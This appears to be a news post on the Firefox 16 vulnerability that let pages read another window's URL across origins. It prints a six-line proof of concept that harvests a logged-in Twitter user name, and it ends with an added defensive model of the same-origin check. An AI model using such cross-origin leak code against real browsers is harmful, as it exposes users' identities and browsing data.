Mozilla released the official Firefox 16 a few days ago, but a major security vulnerability surfaced just one day after the release. Mozilla then removed the Firefox 16 download link from its official homepage; in the meantime, we will continue to provide Firefox 15.0.1.
Mozilla explained: "This vulnerability may allow malicious websites to obtain user access records and steal URL or URL parameters. However, there is no indication that the vulnerability has been exploited."
The following code shows how this vulnerability can be exploited to obtain user information. It is very simple, with only 6 lines:

    function POC() {
      // Open a Twitter page in a new window; Twitter redirects it to a URL
      // containing the logged-in user's name.
      var win = window.open('https://twitter.com/lists/', 'newwin', 'width=200,height=100');
      setTimeout(function () {
        // On Firefox 16, win.location could be read cross-origin, so the
        // redirected URL (and the user name in it) leaks to the opener.
        alert('hello ' + /^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1]);
      }, 5000);
    }
This code demonstrates using the Firefox 16 vulnerability to collect Twitter user names. Of course, you can do a lot more!!!
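As an added illustration (not part of the original article and not Firefox's code), here is a simplified JavaScript model of the same-origin check a correctly behaving browser applies before a script may read another window's location: the opener's origin and the opened window's current origin are compared on scheme, host and port, and a mismatch raises a SecurityError instead of returning the URL. The window model, the function names and the sample origins are assumptions made for the example.

```javascript
// Added example: a minimal model of the same-origin check that a patched
// browser performs for window.location. Names are assumptions, not Firefox code.

// Origin tuple (scheme, host, port) as a string, with default ports made explicit
// so that "https://twitter.com/" and "https://twitter.com:443/" compare equal.
function originOf(href) {
  const u = new URL(href);
  const defaultPort = u.protocol === 'https:' ? '443' : u.protocol === 'http:' ? '80' : '';
  return `${u.protocol}//${u.hostname}:${u.port || defaultPort}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Models a window opened by a script running at `openerHref`. The opened
// window may navigate on its own (e.g. twitter.com/lists/ redirecting to the
// logged-in user's profile); `currentHref` is where it ended up.
function openedWindow(openerHref, currentHref) {
  return {
    get location() {
      // The check that the Firefox 16 bug skipped: a cross-origin opener must
      // not learn the URL the other window navigated to.
      if (!sameOrigin(openerHref, currentHref)) {
        const err = new Error('Permission denied to access property "location"');
        err.name = 'SecurityError';
        throw err;
      }
      return currentHref;
    },
  };
}

// What a script at `openerHref` can learn about the opened window:
// the URL when same-origin, or 'blocked' when the browser refuses access.
function probe(openerHref, currentHref) {
  try {
    return openedWindow(openerHref, currentHref).location;
  } catch (e) {
    return e.name === 'SecurityError' ? 'blocked' : 'error';
  }
}
```

With the check in place, the redirected profile URL from the article's example is only readable by a script that itself runs on twitter.com.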